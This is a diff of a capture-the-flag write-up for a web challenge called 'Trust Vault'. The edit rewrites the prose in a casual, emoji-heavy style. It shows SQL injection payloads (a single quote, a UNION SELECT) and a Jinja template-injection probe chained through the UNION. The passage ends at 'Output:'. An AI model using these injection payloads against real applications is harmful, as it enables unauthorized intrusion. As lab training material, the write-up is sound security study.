l4zz3rj0d/ctf-vault/web/Trust Vault/README.md

 /reports

-The /search page displayed sanitized SQL queries such as:
+The /search endpoint showed queries like:

 SELECT content FROM messages WHERE topic = '<input>'

-This immediately indicated raw string concatenation and therefore potential SQL injection.
+Which basically screams:

+💀 “Please inject me.”

+Raw string concatenation — a classic security sin.

-3. Verifying SQL Injection
+3️⃣ Verifying SQL Injection

-Testing with a simple quote:
+Testing with:

 ?topic='

-Produced:
+Result:

 Error: unrecognized token: "'''"

+Boom.
-This confirmed SQL syntax was breaking → SQL injection valid.
+SQL broken → SQL Injection confirmed. ✔️

-4. UNION Injection
+4️⃣ UNION Injection

-We tested if output could be controlled:
+Next step: test if we can take over the query output.

 ?topic=' UNION SELECT 'TEST'-- -

-The page displayed:
+The result:

 TEST

-So the application accepts UNION SELECT with a string literal.

-That means we can inject any Jinja expression through this SQLi.
+Which means:

+✨ We fully control what gets rendered
+💡 And whatever gets rendered is fed into Jinja…

+Time to make it dance.

-5. Testing for Jinja SSTI
+5️⃣ Testing for Jinja SSTI

-Injected:
+Payload:

-?topic=' UNION SELECT '{{7*7}}'-- -
+' UNION SELECT '{{7*7}}'-- -

 Output: